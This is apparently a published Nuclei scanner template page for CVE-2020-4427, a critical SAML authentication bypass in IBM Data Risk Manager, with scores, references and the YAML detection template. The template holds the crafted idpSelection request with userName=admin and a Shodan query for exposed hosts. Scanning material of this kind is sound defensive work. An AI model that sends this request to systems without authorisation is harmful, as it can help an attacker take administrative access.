IBM Data Risk Manager - Authentication Bypass via SAML
CVE-2020-4427
Early Release
Description
IBM Data Risk Manager versions 2.0.1 through 2.0.6 are vulnerable to authentication bypass when configured with SAML authentication. A remote attacker can bypass security restrictions by sending a specially crafted HTTP request to the SAML idpSelection endpoint, allowing them to bypass the authentication process and gain full administrative access to the system.
Severity
Critical
CVSS Score
9.8
Exploit Probability
56%
Affected Product
data_risk_manager
Published Date
October 10, 2025
Template Author
ritikchaddha
CVE-2020-4427.yaml
id: CVE-2020-4427 info: name: IBM Data Risk Manager - Authentication Bypass via SAML author: ritikchaddha severity: critical description: | IBM Data Risk Manager versions 2.0.1 through 2.0.6 are vulnerable to authentication bypass when configured with SAML authentication. A remote attacker can bypass security restrictions by sending a specially crafted HTTP request to the SAML idpSelection endpoint, allowing them to bypass the authentication process and gain full administrative access to the system. reference: - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/ibm_drm_rce.rb - https://seclists.org/fulldisclosure/2020/Apr/33 - https://www.ibm.com/support/pages/node/6206875 - https://nvd.nist.gov/vuln/detail/CVE-2020-4427 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-4427 cwe-id: CWE-287 epss-score: 0.55750 epss-percentile: 0.97955 cpe: cpe:2.3:a:ibm:data_risk_manager:*:*:*:*:*:*:*:* metadata: verified: false max-request: 1 vendor: ibm product: data_risk_manager shodan-query: title:"IBM Data Risk Manager" tags: cve,cve2020,ibm,saml,auth-bypass,kev http: - method: GET path: - "{{BaseURL}}/albatross/saml/idpSelection?id={{randstr}}&userName=admin" matchers-condition: and matchers: - type: word part: location words: - "localhost:8765" - "saml/idpSelection" condition: and - type: status status: - 302 extractors: - type: kval part: header kval: - location # digest: 4a0a0047304502204245137dca694b5d9631dd0a18a2f1924d39243b937b5e8ef0b13b2398f09c0e022100b62e1b338b3d742d9f0a17d15b85018bc72e00472f09880bc32d59e5d5895fdc:922c64590222798bb761d5b6d8e72950
9.8Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2020-4427
CWE ID:
cwe-287